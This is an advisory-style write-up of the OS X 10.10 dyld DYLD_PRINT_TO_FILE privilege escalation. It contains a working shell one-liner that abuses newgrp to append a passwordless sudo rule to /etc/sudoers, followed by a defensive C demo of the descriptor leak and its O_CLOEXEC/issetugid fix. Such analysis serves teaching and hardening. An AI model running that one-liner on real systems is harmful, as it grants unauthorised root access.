In OS X 10.10 Apple added a number of new features to dyld. One of them lets the user redirect the dynamic linker's log output to an arbitrary file through the DYLD_PRINT_TO_FILE environment variable. The dyld man page describes it as follows:
DYLD_PRINT_TO_FILE
This is a path to a (writable) file. Normally, the dynamic linker writes all logging output (triggered by DYLD_PRINT_* settings) to file descriptor 2 (which is usually stderr). But this setting causes the dynamic linker to write logging output to the specified file.
SUID binaries honour this variable too: dyld does not ignore it for set-uid processes, and the descriptor it opens for the log file is a plain open() without O_CLOEXEC, so it stays open across exec and is inherited by any child the privileged program spawns. The result is an arbitrary file write as root, i.e. a local privilege escalation.
OS X 10.10
OSX 10.11 (El Capitan)
e.g. using the arbitrary file write to obtain sudo privileges. newgrp is set-uid root and spawns a shell; dyld opens /etc/sudoers as fd 3 inside the newgrp process, the shell inherits that descriptor, and the piped command appends a NOPASSWD rule for the current user through it:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
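The two defects the one-liner above depends on, re-created in C as an added example (this is not dyld's code or Apple's fix): a log path taken from the environment is opened without O_CLOEXEC, and the process holding that descriptor then execs /bin/sh, which writes through the inherited fd just as `>&3` does. The hardened variant shows the two independent fixes: ignore the variable when the process is set-uid (issetugid() on macOS; the uid/gid comparison is an assumed portable stand-in so the example builds on Linux too) and open the file with O_CLOEXEC. A mkstemp() file under /tmp stands in for /etc/sudoers and the sudoers-style payload line is constructed sample data.

```c
#ifdef __linux__
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern (as described for dyld): the log file named by an
 * environment variable is opened without O_CLOEXEC, so the descriptor is
 * inherited by every child the privileged process later execs. */
int open_log_vulnerable(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
}

/* Hardened variant: O_CLOEXEC closes the descriptor on execve(), so a child
 * shell cannot write through it even if the path was attacker-controlled. */
int open_log_hardened(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_APPEND | O_CLOEXEC, 0644);
}

/* Independent second fix: a set-uid process must not trust its environment.
 * issetugid() is the macOS primitive; the uid/gid comparison is an assumed
 * portable approximation so the example also builds on Linux. */
int process_is_restricted(void)
{
#ifdef __APPLE__
    return issetugid();
#else
    return getuid() != geteuid() || getgid() != getegid();
#endif
}

/* The decision a loader or privileged program should make: -1 means "keep
 * logging to stderr", otherwise a descriptor for the requested file. */
int choose_log_fd(const char *env_path, int hardened)
{
    if (env_path == NULL)
        return -1;
    if (hardened && process_is_restricted())
        return -1;            /* set-uid: ignore the attacker-controlled path */
    return hardened ? open_log_hardened(env_path) : open_log_vulnerable(env_path);
}

/* 1 if fd would still be open after execve() (no FD_CLOEXEC flag), else 0. */
int fd_survives_exec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    return flags >= 0 && !(flags & FD_CLOEXEC);
}

/* Constructed sample payload in sudoers syntax (not a real user). */
static const char PAYLOAD[] = "attacker ALL=(ALL) NOPASSWD:ALL";

/* Re-enacts the newgrp step: the holder of the log fd spawns /bin/sh and the
 * shell tries to append PAYLOAD through that fd number, like `>&3` in the
 * exploit.  Returns 1 if the payload reached `path`, 0 otherwise. */
static int shell_writes_through_fd(int fd, const char *path)
{
    char cmd[128];
    snprintf(cmd, sizeof cmd, "printf '%%s\\n' '%s' >&%d", PAYLOAD, fd);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    int status;
    waitpid(pid, &status, 0);

    /* Check the file itself rather than trusting the child's exit status. */
    char buf[256] = {0};
    int rfd = open(path, O_RDONLY);
    if (rfd < 0)
        return 0;
    ssize_t n = read(rfd, buf, sizeof buf - 1);
    close(rfd);
    return n > 0 && strstr(buf, PAYLOAD) != NULL;
}

/* End-to-end run. hardened=0 reproduces the leak; hardened=1 shows O_CLOEXEC
 * stopping it (and, in a real set-uid process, the variable being ignored).
 * Returns 1 if the child shell managed to write into the file. */
int demo_leak(int hardened)
{
    char path[] = "/tmp/dyld_print_demo_XXXXXX";   /* stands in for /etc/sudoers */
    int tfd = mkstemp(path);
    if (tfd < 0)
        return -1;
    close(tfd);

    int fd = choose_log_fd(path, hardened);
    int leaked = (fd >= 0) ? shell_writes_through_fd(fd, path) : 0;

    if (fd >= 0)
        close(fd);
    unlink(path);
    return leaked;
}

int main(void)
{
    printf("vulnerable open: child wrote through inherited fd -> %d\n", demo_leak(0));
    printf("hardened open:   child wrote through inherited fd -> %d\n", demo_leak(1));
    return 0;
}
```

Running it as an ordinary user prints 1 for the vulnerable path and 0 for the hardened one: with O_CLOEXEC the shell's `>&N` redirection fails with "Bad file descriptor" and nothing lands in the file. Note that O_CLOEXEC alone would not have saved dyld if it ever logged after exec through a dup'd descriptor; refusing to honour DYLD_* variables in a set-uid process is the fix that removes the attacker's control of the path in the first place.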